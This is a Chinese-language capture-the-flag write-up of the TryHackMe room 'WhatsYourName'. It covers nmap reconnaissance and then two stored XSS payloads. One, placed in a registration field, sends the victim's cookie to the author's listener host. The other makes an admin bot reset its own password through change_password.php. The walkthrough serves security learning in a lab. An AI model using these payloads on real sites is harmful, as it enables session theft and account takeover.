打靶记录(一一六)之THMWhatsYourName

端口扫描

└─# nmap --min-rate=10000 -p- worldwap.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-04 08:31 UTC
Nmap scan report for worldwap.thm (10.10.174.96)
Host is up (0.0086s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8081/tcp open  blackice-icecap
MAC Address: 02:A6:09:94:BB:73 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.43 seconds

└─# nmap -sT -sV -sC -O -p22,80,8081 worldwap.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-04 08:32 UTC
Nmap scan report for worldwap.thm (10.10.174.96)
Host is up (0.00043s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e35ef635600d88cc9f808ec8518eb0bf (RSA)
|   256 eab85205644099b134426cc3f7ce7f1e (ECDSA)
|_  256 ee6afc284d3c5c619d313482ecfa1316 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-title: Welcome
|_Requested resource was /public/html/
|_http-server-header: Apache/2.4.41 (Ubuntu)
8081/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 02:A6:09:94:BB:73 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 3.8 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.70 seconds

└─# nmap --script=vuln -p22,80,8081 worldwap.thm 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-04 08:33 UTC
Nmap scan report for worldwap.thm (10.10.174.96)
Host is up (0.00028s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|   /phpmyadmin/: phpMyAdmin
|   /api/: Potentially interesting folder
|_  /public/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
8081/tcp open  blackice-icecap
MAC Address: 02:A6:09:94:BB:73 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 31.15 seconds

moderator

开放了80和8081两个web端口，但是8081端口是白页，应该是域名解析的问题。但是使用ffuf扫描子域名却扫不出来

先看80端口的网页，能够注册一个账号

注册完后需要访问login.worldwap.thm来登录，添加hosts

访问: http://login.worldwap.thm/login.php 经过验证，这就是开设在8081端口的web服务,但奇怪的是刚刚注册的用户凭证无法使用

在扫描了一些目录后没什么结果，根据房间提示从js入手操纵cookie,猜测是XSS。回到注册界面，站主会审查注册的details

开启cookie-stealer,在注册界面输入:

<script>new Image().src="http://10.11.77.28:8888/?"+document.cookie;</script>

过了一会儿后，本地服务器收到到了cookie:70b6878pmoj2c5dgglddmc8smf

替换cookie之后，访问主界面，重定向到了dashboard.php，但是当访问login.worldwap.thm/login.php时，已经是主持人身份登录状态

admin

但是似乎还存在一个管理员账号需要获取。changepassword功能只有管理员能够使用,还有一个chat界面，里面有一个admin bot,似乎能够与之交互，再次发送之前的XSSpayload发现存在黑名单过滤

<script>fetch('/change_password.php',{method:'POST',headers:{'Content-Type':'application/x-www-form-urlencoded'},body:"new_password=admin"});</script>

让其直接访问更改密码的界面，并且更改密码为”admin”

推出当前用户，登录admin用户，成功!

碎碎念

学习到的XSS的新型玩法